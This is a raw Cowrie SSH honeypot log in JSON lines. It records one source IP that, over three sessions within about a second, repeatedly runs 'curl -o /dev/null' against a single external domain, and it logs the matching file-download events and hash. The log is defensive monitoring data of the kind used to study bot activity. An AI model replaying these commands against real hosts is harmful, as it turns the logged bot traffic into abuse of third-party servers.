{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.610258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.612293Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.614946Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.616144Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.616634Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.618471Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.619750Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.621620Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.622195Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.624581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.667910Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.669069Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.669825Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.672048Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.672825Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.675292Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.677910Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.678942Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.683939Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.715489Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.717417Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.719996Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.721305Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.721972Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.726873Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.727583Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.729010Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.729662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.763891Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.765688Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.766970Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.767404Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.781109Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.781852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.799921Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.800591Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.803445Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.803977Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.814538Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.816194Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.833527Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.835757Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.837011Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.837540Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.840044Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.840662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.841903Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.842370Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.848677Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.852028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.881925Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.882922Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.883478Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.886363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.887694Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.903545Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.915333Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.915977Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.920023Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.947083Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.951851Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.952460Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.960203Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.960819Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.964906Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.965448Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.989814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.991548Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.993650Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.995388Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.996096Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.000189Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.001221Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.003555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.012664Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.013514Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.014085Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.037623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.038229Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.040245Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
